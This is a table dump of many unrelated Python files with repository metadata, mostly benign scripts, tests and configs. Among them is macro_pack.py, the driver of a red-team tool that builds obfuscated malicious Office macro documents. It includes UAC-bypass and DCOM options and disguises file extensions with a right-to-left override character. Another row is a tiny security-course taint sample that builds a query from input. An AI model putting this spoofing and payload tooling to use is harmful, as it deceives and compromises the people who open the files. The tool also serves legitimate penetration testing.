max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
brownie_fund_me/scripts/fund_and_withdraw.py | WangCHEN9/solidity_demos | 0 | 1200 | from brownie import FundMe
from scripts.helpful_scripts import get_account
def fund():
fund_me = FundMe[-1]
account = get_account()
entrance_fee = fund_me.getEntranceFee()
print(f"entrance is {entrance_fee}")
print("funding..")
fund_me.fund({"from": account, "value": entrance_fee})
def withdraw():
fund_me = FundMe[-1]
account = get_account()
fund_me.withdraw({"from": account})
def main():
fund()
withdraw()
if __name__ == "__main__":
main()
| 2.671875 | 3 |
ex019.py | jefernathan/Python | 0 | 1201 | # A teacher wants to randomly pick one of his four students to erase the board. Write a program that helps him by reading the students' names and printing the chosen one on the screen.
from random import choice
nome1 = input('Digite um nome: ')
nome2 = input('Digite outro nome: ')
nome3 = input('Digite mais um nome: ')
nome4 = input('Digite o último nome: ')
nome = [nome1, nome2, nome3, nome4]
print(choice(nome))
| 3.875 | 4 |
contacts/admin.py | liviamendes/agenda-django-project | 0 | 1202 | <filename>contacts/admin.py
from django.contrib import admin
from .models import Categoria, Contact
class ContactAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'last_name', 'phone', 'email', 'creation_date', 'categoria', 'show')
list_display_links = ('id', 'name', 'last_name')
list_filter = ('categoria',)
list_per_page = 10
search_fields = ('name', 'last_name', 'phone')
list_editable = ('phone', 'show')
admin.site.register(Categoria)
admin.site.register(Contact, ContactAdmin)
| 1.921875 | 2 |
upload_from_folder.py | robinrobinzon/fastpic | 0 | 1203 | import datetime
import os
import shutil
import tempfile
from joblib import Parallel, delayed
from fastpic_upload import upload_file_to_fastpic
_n_jobs_for_upload = 20
_root_folders_set = (
'/path/to/folder',
)
_spoiler_for_each_file = True
def process_one_pic(result_key, pic_path, tmp_dir):
pic_url, pic_link = upload_file_to_fastpic(pic_path, tmp_dir)
print(pic_url)
return result_key, (pic_url, pic_link)
def upload_from_folder(folder_path):
pics_to_upload = {}
for root, dirs, files in os.walk(folder_path):
for file in files:
if file.split('.')[-1] not in ('jpg', 'jpeg', 'bmp', 'png'):
continue
file_path = os.path.join(root, file)
pics_to_upload[file] = file_path
print(pics_to_upload)
print('Need to upload {} photos'.format(len(pics_to_upload)))
result = {}
tmp_dir = tempfile.mkdtemp()
try:
sub_results = Parallel(n_jobs=_n_jobs_for_upload, backend='threading')(
delayed(process_one_pic)(key, pics_to_upload[key], tmp_dir) for key in sorted(pics_to_upload))
for sub_result in sub_results:
result[sub_result[0]] = sub_result[1]
finally:
shutil.rmtree(tmp_dir)
return result
def print_result_to_file(result, result_file_path):
with open(result_file_path, 'w', encoding='utf8', newline='') as codes_file:
codes_file.write('[spoiler="Скриншоты"]')
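# ("Скриншоты" is Russian for "Screenshots"; the tags written here are BBCode forum markup.)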
codes_file.write(os.linesep)
codes_file.write(os.linesep)
for result_key in sorted(result):
if _spoiler_for_each_file:
codes_file.write('[spoiler="{}"]'.format(result_key))
codes_file.write(os.linesep)
url, link = result[result_key]
codes_file.write('[url={}][img]{}[/img][/url]'.format(link, url))
if _spoiler_for_each_file:
codes_file.write(os.linesep)
codes_file.write('[/spoiler]')
codes_file.write(os.linesep)
codes_file.write(os.linesep)
codes_file.write('[/spoiler]')
def main():
for root_folder in _root_folders_set:
result = upload_from_folder(root_folder)
print_result_to_file(result, os.path.join(root_folder, 'result_codes.txt'))
if __name__ == '__main__':
started = datetime.datetime.now()
print(started, 'started')
main()
finished = datetime.datetime.now()
print(finished, 'all done in', finished - started)
| 2.59375 | 3 |
tools/accuracy_checker/openvino/tools/accuracy_checker/postprocessor/clip_segmentation_mask.py | TolyaTalamanov/open_model_zoo | 2,201 | 1204 | <gh_stars>1000+
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from .postprocessor import PostprocessorWithSpecificTargets
from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction
from ..config import NumberField, ConfigError
class ClipSegmentationMask(PostprocessorWithSpecificTargets):
__provider__ = 'clip_segmentation_mask'
annotation_types = (BrainTumorSegmentationAnnotation, )
prediction_types = (BrainTumorSegmentationPrediction, )
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description="Min value"),
'max_value': NumberField(value_type=int, description="Max value")
})
return parameters
def configure(self):
self.min_value = self.get_value_from_config('min_value')
self.max_value = self.get_value_from_config('max_value')
if self.max_value < self.min_value:
raise ConfigError('max_value should be greater than min_value')
def process_image(self, annotation, prediction):
for target in annotation:
target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)
for target in prediction:
target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)
return annotation, prediction
| 2.0625 | 2 |
tests/test_utils.py | isabella232/pynacl | 756 | 1205 | <filename>tests/test_utils.py
# Copyright 2013 <NAME> and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nacl.secret
import nacl.utils
def test_random_bytes_produces():
assert len(nacl.utils.random(16)) == 16
def test_random_bytes_produces_different_bytes():
assert nacl.utils.random(16) != nacl.utils.random(16)
def test_string_fixer():
assert str(nacl.secret.SecretBox(b"\x00" * 32)) == str(b"\x00" * 32)
def test_deterministic_random_bytes():
expected = (
b"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba"
b"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f"
b"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf"
b"982a1bb4587a5c970ff0810ca3b791d7e12"
)
seed = (
b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
b"\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b"
b"\x1c\x1d\x1e\x1f"
)
assert (
nacl.utils.randombytes_deterministic(
100, seed, encoder=nacl.utils.encoding.HexEncoder
)
== expected
)
def test_deterministic_random_bytes_invalid_seed_length():
expected = "Deterministic random bytes must be generated from 32 bytes"
seed = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
with pytest.raises(TypeError) as e:
nacl.utils.randombytes_deterministic(100, seed)
assert expected in str(e.value)
| 2 | 2 |
Solutions/6kyu/6kyu_mister_safetys_treasure.py | citrok25/Codewars-1 | 46 | 1206 | def unlock(m):
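# Map each letter to the digit it shares on a phone keypad (abc -> 2, def -> 3, ..., wxyz -> 9).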
return m.lower().translate(
str.maketrans(
'abcdefghijklmnopqrstuvwxyz',
'22233344455566677778889999'
)
)
| 1.882813 | 2 |
guesstheword.py | Cha0sNation/RandomPython | 0 | 1207 | #! /home/cha0snation/anaconda3/bin/python
import random
def setup():
words = ["banana", "apple", "orange", "peach", "grape", "watermelon"]
output = []
word = words[random.randint(0, len(words) - 1)]
playing = True
tries = 5
return [words, output, word, tries, playing]
def check_finished(output, tries):
if tries == 0:
print("You ran out of tries")
print()
return True
count = 0
for letter in output:
if letter != "_":
count += 1
if count == len(output):
print_output(output)
print()
print()
return True
return False
def check_letter(guess, word, tries):
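# Reveal every position of `word` matching the guessed letter in the module-level `output` list;
# return tries - 1 on a complete miss, otherwise return tries unchanged.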
correct = False
for index, letter in enumerate(word):
if letter == guess:
output[index] = guess
correct = True
if index == len(word) - 1:
if not correct:
print("Incorrect guess")
print()
return tries - 1
else:
return tries
def check_same(guess, output):
same = False
for i in output:
if i == guess:
same = True
if same:
print("You already found that letter")
print()
print_output(output)
print()
print()
while True:
guess = str(input("Guess: "))
if len(guess) == 1:
break
return guess
else:
return guess
def print_output(output):
for i in output:
print("{0} ".format(i), end="")
if __name__ == "__main__":
words, output, word, tries, playing = setup()
while playing:
print("Try to guess the word:")
if tries == 1:
print("You have {0} try left.".format(tries))
else:
print("You have {0} tries left.".format(tries))
# print("DEBUG: word is {0}".format(word))
if output == []:
for i in word:
output.append("_")
for i in range(len(output)):
print("_ ", end="")
else:
print_output(output)
print()
print()
try:
while True:
guess = str(input("Guess: "))
if len(guess) == 1:
break
except (EOFError, KeyboardInterrupt):
print()
break
except ValueError:
print("Invalid guess")
break
print()
guess = check_same(guess, output)
tries = check_letter(guess, word, tries)
if check_finished(output, tries):
choice = input("Do you want to play again ? (y or n): ")
print()
if choice.lower().startswith("y"):
words, output, word, tries, playing = setup()
else:
playing = False
| 4.03125 | 4 |
web_app/index.py | svakulenk0/ArtDATIS | 0 | 1208 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Dec 8, 2019
.. codeauthor: <NAME>
<<EMAIL>>
Index docs into ES
https://qbox.io/blog/building-an-elasticsearch-index-with-python
'''
from settings import *
import glob
import re
# n first characters for the doc preview
LIMIT_START = 100
txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH
text_corpus = []
def corpus_iterator():
# filter out and collect text files
for file_path in glob.glob(txts_path+'*_text.txt'):
with open(file_path, encoding="utf-8") as file:
text = file.read()
# filter duplicates
if text not in text_corpus:
text_corpus.append(text)
text = re.sub(' +', ' ', text)
start_text = text.lstrip()[:LIMIT_START]
with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file:
path = path_file.read().strip().replace(DATA_PATH, '/images')
yield {
"_index": INDEX_NAME,
"_type": TYPE_NAME,
"_source": {"file_path": path, "text": text, "start_text": start_text},
}
print("Loaded %d documents"%len(text_corpus))
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk
# create ES client, create index
es = Elasticsearch(hosts = [ES_HOST])
if es.indices.exists(INDEX_NAME):
print("deleting '%s' index..." % (INDEX_NAME))
res = es.indices.delete(index = INDEX_NAME)
print(" response: '%s'" % (res))
request_body = {
"settings" : {
"number_of_shards": 1,
"number_of_replicas": 0
}
}
print("creating '%s' index..." % (INDEX_NAME))
res = es.indices.create(index = INDEX_NAME, body = request_body)
print(" response: '%s'" % (res))
# bulk index the data
print("bulk indexing...")
bulk(es, corpus_iterator())
# sanity check
res = es.search(index = INDEX_NAME, size=2, body={"query": {"match_all": {}}})
print("results:")
for hit in res['hits']['hits']:
print(hit["_source"])
| 2.828125 | 3 |
src/tokens.py | PythonIsMagic/ponyup | 1 | 1209 | """
A Token is a button or other object on the table that represents a position, a game state, a player state, or some other piece of info.
"""
class Token(object):
def __init__(self, name, table):
self.table = table
self.name = name
self.seat = None
| 2.96875 | 3 |
T05-09/program.py | maa76/SSof-Project1920 | 2 | 1210 | <filename>T05-09/program.py<gh_stars>1-10
nis=get('nis')
q1="xpto1"
q2=nis + "xpto2"
query=query1.q2
koneksi=0
q=execute(query,koneksi)
| 1.523438 | 2 |
Chapter09/interpolation_search.py | Xiangs18/Algorithms-with-Python-Second-Edition | 0 | 1211 | def nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value):
# Estimate the probe position by linear interpolation between the two bounds.
# Multiply before the integer division so the slope is not floored to zero.
return lower_bound_index + (
(search_value - input_list[lower_bound_index])
* (upper_bound_index - lower_bound_index)
// (input_list[upper_bound_index] - input_list[lower_bound_index])
)
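# Illustrative trace of the probe formula above on the sample list used at the bottom of this file:
# store = [2, 4, 5, 12, 43, 54, 60, 77], term = 43
# pass 1: lo=0, hi=7 -> mid = 0 + (43-2)*(7-0)//(77-2) = 3; store[3] = 12 < 43, so lo becomes 4
# pass 2: lo=4, hi=7 -> mid = 4 + (43-43)*(7-4)//(77-43) = 4; store[4] = 43, so index 4 is returned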
def interpolation_search(ordered_list, term):
size_of_list = len(ordered_list) - 1
index_of_first_element = 0
index_of_last_element = size_of_list
while index_of_first_element <= index_of_last_element:
mid_point = nearest_mid(
ordered_list, index_of_first_element, index_of_last_element, term
)
if mid_point > index_of_last_element or mid_point < index_of_first_element:
return None
if ordered_list[mid_point] == term:
return mid_point
if term > ordered_list[mid_point]:
index_of_first_element = mid_point + 1
else:
index_of_last_element = mid_point - 1
store = [2, 4, 5, 12, 43, 54, 60, 77]
a = interpolation_search(store, 2)
print("Index position of value 2 is ", a)
| 3.828125 | 4 |
projects/models.py | javixeneize/asvs-1 | 1 | 1212 | from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from django.urls import reverse
class ProjectQuerySet(models.QuerySet):
def projects_per_user(self, user):
return self.filter(
Q(project_owner=user.username)
)
class Projects(models.Model):
project_name = models.CharField(max_length=60)
project_owner = models.CharField(default=User, max_length=60)
project_created = models.DateTimeField(auto_now_add=True)
project_description = models.CharField(max_length=255)
project_level = models.IntegerField(default=0)
objects = ProjectQuerySet.as_manager()
def __str__(self):
return str(self.pk)
| 2.28125 | 2 |
tests/serverless/checks/aws/test_AdminPolicyDocument.py | peaudecastor/checkov | 0 | 1213 | import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
def test_summary(self):
runner = Runner()
current_dir = os.path.dirname(os.path.realpath(__file__))
# Used in
os.environ["sneaky_var"] = "*"
test_files_dir = current_dir + "/example_AdminPolicyDocument"
report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
summary = report.get_summary()
self.assertEqual(summary['passed'], 2,
f"Passed checks: {[fc.file_path for fc in report.passed_checks]}")
self.assertEqual(summary['failed'], 6,
f"Failed checks: {[fc.file_path for fc in report.failed_checks]}")
self.assertEqual(summary['skipped'], 0,
f"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}")
self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
unittest.main()
| 2.25 | 2 |
src/macro_pack.py | lulinsheng/macro_pack | 0 | 1214 | #!/usr/bin/python3
# encoding: utf-8
import os
import sys
import getopt
import logging
import shutil
import psutil
from modules.com_run import ComGenerator
from modules.web_server import ListenServer
from modules.Wlisten_server import WListenServer
from modules.payload_builder_factory import PayloadBuilderFactory
from common import utils, mp_session, help
from common.utils import MSTypes
from common.definitions import VERSION, LOGLEVEL
if sys.platform == "win32":
try:
import win32com.client #@UnresolvedImport @UnusedImport
except:
print("Error: Could not find win32com.")
sys.exit(1)
MP_TYPE="Pro"
if utils.checkModuleExist("pro_core"):
from pro_modules.utilities.dcom_run import DcomGenerator
from pro_modules.payload_builders.containers import ContainerGenerator
from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro
from pro_core import arg_mgt_pro, mp_session_pro
else:
MP_TYPE="Community"
from colorama import init
from termcolor import colored
# {PyArmor Protection Code}
# {PyArmor Plugins}
# use Colorama to make Termcolor work on Windows too
init()
WORKING_DIR = "temp"
BANNER = help.getToolPres()
def main(argv):
global MP_TYPE
logLevel = LOGLEVEL
# initialize macro_pack session object
working_directory = os.path.join(os.getcwd(), WORKING_DIR)
if MP_TYPE == "Pro":
mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE)
else:
mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)
try:
longOptions = ["embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=", "encode",
"obfuscate", "obfuscate-form", "obfuscate-names", "obfuscate-declares", "obfuscate-strings",
"obfuscate-names-charset=", "obfuscate-names-minlen=", "obfuscate-names-maxlen=",
"file=","template=","listtemplates","listformats","icon=", "start-function=","uac-bypass",
"unicode-rtlo=", "dde", "print", "force-yes", "help"]
shortOptions= "e:l:w:s:f:t:G:hqmop"
# only for Pro release
if MP_TYPE == "Pro":
longOptions.extend(arg_mgt_pro.proArgsLongOptions)
shortOptions += arg_mgt_pro.proArgsShortOptions
# Only enabled on windows
if sys.platform == "win32":
longOptions.extend(["run=", "run-visible"])
opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable
except getopt.GetoptError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(2)
for opt, arg in opts:
if opt in ("-o", "--obfuscate"):
mpSession.obfuscateForm = True
mpSession.obfuscateNames = True
mpSession.obfuscateStrings = True
mpSession.obfuscateDeclares = True
elif opt=="--obfuscate-form":
mpSession.obfuscateForm = True
elif opt=="--obfuscate-declares":
mpSession.obfuscateDeclares = True
elif opt=="--obfuscate-names":
mpSession.obfuscateNames = True
elif opt=="--obfuscate-names-charset":
try:
mpSession.obfuscatedNamesCharset = arg
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-names-minlen":
try:
mpSession.obfuscatedNamesMinLen = int(arg)
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-names-maxlen":
try:
mpSession.obfuscatedNamesMaxLen = int(arg)
except ValueError:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="--obfuscate-strings":
mpSession.obfuscateStrings = True
elif opt=="-s" or opt=="--start-function":
mpSession.startFunction = arg
elif opt=="-l" or opt=="--listen":
mpSession.listen = True
mpSession.listenRoot = os.path.abspath(arg)
elif opt=="--port":
mpSession.listenPort = int(arg)
mpSession.WlistenPort = int(arg)
elif opt=="--icon":
mpSession.icon = arg
elif opt=="-w" or opt=="--webdav-listen":
mpSession.Wlisten = True
mpSession.WRoot = os.path.abspath(arg)
elif opt == "-f" or opt== "--input-file":
mpSession.fileInput = arg
elif opt == "-e" or opt== "--embed":
mpSession.embeddedFilePath = os.path.abspath(arg)
elif opt=="-t" or opt=="--template":
mpSession.template = arg
elif opt == "--listtemplates":
help.printTemplatesUsage(BANNER, sys.argv[0])
sys.exit(0)
elif opt=="-q" or opt=="--quiet":
logLevel = "WARN"
elif opt=="-p" or opt=="--print":
mpSession.printFile = True
elif opt == "--dde":
if sys.platform == "win32":
mpSession.ddeMode = True
elif opt == "--run":
if sys.platform == "win32":
mpSession.runTarget = os.path.abspath(arg)
elif opt == "--run-visible":
if sys.platform == "win32":
mpSession.runVisible = True
elif opt == "--force-yes":
mpSession.forceYes = True
elif opt=="--uac-bypass":
mpSession.uacBypass = True
elif opt == "--unicode-rtlo":
mpSession.unicodeRtlo = arg
elif opt in ("-G", "--generate"):
mpSession.outputFilePath = os.path.abspath(arg)
elif opt == "--listformats":
help.printAvailableFormats(BANNER)
sys.exit(0)
elif opt=="-h" or opt=="--help":
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
else:
if MP_TYPE == "Pro":
arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER)
else:
help.printUsage(BANNER, sys.argv[0])
sys.exit(0)
if logLevel == "INFO":
os.system('cls' if os.name == 'nt' else 'clear')
# Logging
logging.basicConfig(level=getattr(logging, logLevel),format="%(message)s", handlers=[utils.ColorLogFiler()])
logging.info(colored(BANNER, 'green'))
logging.info(" [+] Preparations...")
# check input args
if mpSession.fileInput is None:
# Argument not supplied, try to get file content from stdin
if not os.isatty(0): # check if something is being piped
logging.info(" [-] Waiting for piped input feed...")
mpSession.stdinContent = sys.stdin.readlines()
# Close Stdin pipe, so we can call input() later without triggering EOF
#sys.stdin.close()
if sys.platform == "win32":
sys.stdin = open("conIN$")
else:
sys.stdin = sys.__stdin__
else:
if not os.path.isfile(mpSession.fileInput):
logging.error(" [!] ERROR: Could not find %s!" % mpSession.fileInput)
sys.exit(2)
else:
logging.info(" [-] Input file path: %s" % mpSession.fileInput)
if MP_TYPE == "Pro":
if mpSession.communityMode:
logging.warning(" [!] Running in community mode (pro features not applied)")
MP_TYPE="Community"
else:
arg_mgt_pro.verify(mpSession)
# Check output file format
if mpSession.outputFilePath:
if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)):
logging.error(" [!] Could not find output folder %s." % os.path.dirname(mpSession.outputFilePath))
sys.exit(2)
if mpSession.outputFileType == MSTypes.UNKNOWN:
logging.error(" [!] %s is not a supported extension. Use --listformats to view supported MacroPack formats." % os.path.splitext(mpSession.outputFilePath)[1])
sys.exit(2)
else:
logging.info(" [-] Target output format: %s" % mpSession.outputFileType)
elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != "Pro" or mpSession.dcomTarget is None):
logging.error(" [!] You need to provide an output file! (get help using %s -h)" % os.path.basename(utils.getRunningApp()))
sys.exit(2)
if not mpSession.isTrojanMode:
# verify that output file does not already exist
if os.path.isfile(mpSession.outputFilePath):
logging.error(" [!] ERROR: Output file %s already exist!" % mpSession.outputFilePath)
sys.exit(2)
#Create temporary folder
logging.info(" [-] Temporary working dir: %s" % working_directory)
if not os.path.exists(working_directory):
os.makedirs(working_directory)
try:
# Create temporary work file.
if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro):
inputFile = os.path.join(working_directory, "command.cmd")
else:
inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + ".vba"
if mpSession.stdinContent is not None:
import time
time.sleep(0.4) # Needed to avoid some weird race condition
logging.info(" [-] Store std input in file...")
f = open(inputFile, 'w')
f.writelines(mpSession.stdinContent)
f.close()
else:
# Create temporary work file
if mpSession.fileInput is not None:
# Check there are no binary chars in the input file
if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)):
logging.error(" [!] ERROR: Invalid format for %s. Input should be text format containing your VBA script." % mpSession.fileInput)
logging.info(" [+] Cleaning...")
if os.path.isdir(working_directory):
shutil.rmtree(working_directory)
sys.exit(2)
logging.info(" [-] Store input file...")
shutil.copy2(mpSession.fileInput, inputFile)
if os.path.isfile(inputFile):
logging.info(" [-] Temporary input file: %s" % inputFile)
# Edit outputfile name to spoof extension if unicodeRtlo option is enabled
if mpSession.unicodeRtlo:
# Reminder; mpSession.unicodeRtlo contains the extension we want to spoof, such as "jpg"
logging.info(" [+] Inject %s false extension with unicode RTLO" % mpSession.unicodeRtlo)
# Separate document path and extension
(fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath)
logging.info(" [-] Extension %s " % fileExtension)
# Append unicode RTLO to file name
fileName += '\u202e'
# Append extension to spoof in reverse order
fileName += '\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does not end with flagged extension
# Append file extension
fileName += fileExtension
mpSession.outputFilePath = fileName
logging.info(" [-] File name modified to: %s" % mpSession.outputFilePath)
# Retrieve the right payload builder
if mpSession.outputFileType != MSTypes.UNKNOWN:
if MP_TYPE == "Pro" and not mpSession.communityMode:
payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession)
else:
payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession)
# Build payload
if payloadBuilder is not None:
payloadBuilder.run()
if MP_TYPE == "Pro":
generator = ContainerGenerator(mpSession)
generator.run()
#run com attack
if mpSession.runTarget:
generator = ComGenerator(mpSession)
generator.run()
if MP_TYPE == "Pro":
#run dcom attack
if mpSession.dcom:
generator = DcomGenerator(mpSession)
generator.run()
# Activate Web server
if mpSession.listen:
listener = ListenServer(mpSession)
listener.run()
# Activate WebDav server
if mpSession.Wlisten:
Wlistener = WListenServer(mpSession)
Wlistener.run()
except Exception:
logging.exception(" [!] Exception caught!")
except KeyboardInterrupt:
logging.error(" [!] Keyboard interrupt caught!")
logging.info(" [+] Cleaning...")
if os.path.isdir(working_directory):
shutil.rmtree(working_directory)
logging.info(" Done!\n")
sys.exit(0)
if __name__ == '__main__':
# check if running from explorer, if yes restart from cmd line
# running_from = psutil.Process(os.getpid()).parent().parent().name()
# if running_from == 'explorer.exe':
# os.system("cmd.exe /k \"%s\"" % utils.getRunningApp())
# PyArmor Plugin: checkPlug()
main(sys.argv[1:])
| 1.59375 | 2 |
faced/const.py | binhmuc/faced | 0 | 1215 | <reponame>binhmuc/faced
import os
MODELS_PATH = os.path.join(os.path.dirname(__file__), "models")
YOLO_SIZE = 288
YOLO_TARGET = 9
CORRECTOR_SIZE = 50
| 1.382813 | 1 |
etl/load/elasticsearch.py | bilalelhoudaigui/plant-brapi-etl-data-lookup-gnpis | 3 | 1216 | <reponame>bilalelhoudaigui/plant-brapi-etl-data-lookup-gnpis
# Load json bulk files into elasticsearch
import json
import os
import time
import traceback
import elasticsearch
from etl.common.store import list_entity_files
from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template
class ElasticSearchException(Exception):
pass
# Init Elasticsearch and test connection
def init_es_client(url, logger):
es_client = elasticsearch.Elasticsearch([url])
try:
info = es_client.info()
logger.debug('Connected to node "{}" of cluster "{}" on "{}"'.format(info['name'], info['cluster_name'], url))
except elasticsearch.exceptions.ConnectionError as e:
logger.error('Connection error: Elasticsearch unavailable on "{}".\nPlease check your configuration'.format(url))
raise e
return es_client
def check_error(response):
if response.get('errors'):
raise ElasticSearchException(response)
def create_index(es_client, index_name, logger):
logger.debug('Creating index "{}"...'.format(index_name))
check_error(es_client.indices.create(index_name))
def delete_index(es_client, index_name, logger):
logger.debug('Deleting index "{}"...'.format(index_name))
check_error(es_client.indices.delete(index_name))
def create_template(es_client, es_config, document_type, base_index_name, logger):
template_name = 'template_elixir_' + base_index_name
template_pattern = base_index_name + '-d*'
mapping = es_config['document-mappings'].get(document_type+"_mapping")
if not mapping:
return
logger.debug('Creating template "{}" on pattern "{}"...'.format(template_name, template_pattern))
template_body = {'template': template_pattern, 'mappings': mapping}
if 'index-settings' in es_config:
template_body['settings'] = es_config['index-settings']
check_error(es_client.indices.put_template(name=template_name, body=template_body))
def bulk_index(es_client, index_name, file_path, logger):
file_name = os.path.basename(file_path)
logger.debug('Bulk indexing file "{}" in index "{}"...'.format(file_name, index_name))
with open(file_path, 'r') as file:
check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms'))
def create_alias(es_client, alias_name, base_index_name, logger):
logger.debug('Creating alias "{}" for index "{}"'.format(alias_name, base_index_name))
check_error(es_client.indices.put_alias(alias_name, base_index_name))
def get_indices(es_client, base_index_name):
indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'})
index_names = list(map(lambda i: i['index'], indices))
index_names.sort(reverse=True)
return index_names
def load_source(source, config, source_bulk_dir, log_dir):
"""
Full Elasticsearch documents indexing
"""
source_name = source['schema:identifier']
action = 'load-elasticsearch-' + source_name
log_file = get_file_path([log_dir, action], ext='.log', recreate=True)
logger = create_logger(source_name, log_file, config['options']['verbose'])
load_config = config['load-elasticsearch']
es_client = init_es_client(load_config['url'], logger)
logger.info("Loading '{}' into elasticsearch '{}'...".format(source_bulk_dir, load_config['url']))
try:
if not os.path.exists(source_bulk_dir):
raise FileNotFoundError(
'No such file or directory: \'{}\'.\n'
'Please make sure you have run the BrAPI extraction and Elasticsearch document transformation'
' before trying to launch the transformation process.'
.format(source_bulk_dir))
bulk_files = list(list_entity_files(source_bulk_dir))
all_document_types = set(map(first, bulk_files))
document_types = load_config.get('document-types') or all_document_types
document_types = document_types.intersection(all_document_types)
index_by_document = dict()
logger.info("Preparing index with template mapping...")
timestamp = int(time.time())
for document_type in document_types:
base_index_name = replace_template(
load_config['index-template'],
{'source': source['schema:identifier'], 'documentType': document_type}
).lower()
create_template(es_client, load_config, document_type, base_index_name, logger)
index_name = base_index_name + '-d' + str(timestamp)
create_index(es_client, index_name, logger)
index_by_document[document_type] = base_index_name, index_name
logger.info("Bulk indexing...")
for document_type, file_path in bulk_files:
if document_type in index_by_document:
base_index_name, index_name = index_by_document[document_type]
bulk_index(es_client, index_name, file_path, logger)
logger.info("Creating index aliases and deleting old indices...")
for document_type, (base_index_name, index_name) in index_by_document.items():
create_alias(es_client, index_name, base_index_name, logger)
new_index, *old_indices = get_indices(es_client, base_index_name)
for old_index in old_indices[1:]:
delete_index(es_client, old_index, logger)
logger.info("SUCCEEDED Loading {}.".format(source_name))
except Exception as e:
logger.debug(traceback.format_exc())
logger.debug(getattr(e, 'long_message', ''))
logger.info("FAILED Loading {} Elasticsearch documents.\n"
"=> Check the logs ({}) for more details."
.format(source_name, log_file))
def main(config):
log_dir = config['log-dir']
bulk_dir = os.path.join(config['data-dir'], 'json-bulk')
if not os.path.exists(bulk_dir):
raise Exception('No json bulk folder found in ' + bulk_dir)
sources = config['sources']
for (source_name, source) in sources.items():
source_bulk_dir = get_folder_path([bulk_dir, source_name])
load_source(source, config, source_bulk_dir, log_dir)
| 2.09375 | 2 |
geoplot/crs.py | redfrexx/geoplot | 0 | 1217 | """
This module defines the ``geoplot`` coordinate reference system classes, wrappers on
``cartopy.crs`` objects meant to be used as parameters to the ``projection`` parameter of all
front-end ``geoplot`` outputs. For the list of Cartopy CRS objects this module derives from,
refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html.
"""
import cartopy.crs as ccrs
import geopandas as gpd
class Base:
# TODO: RotatedPole
"""
Generate instances of ``cartopy.crs``.*name* where *name* matches the instance's class name.
Parameters
----------
`load` : Return a Cartopy CRS initialized with defaults from the `centerings` dictionary,
overridden by initialization parameters.
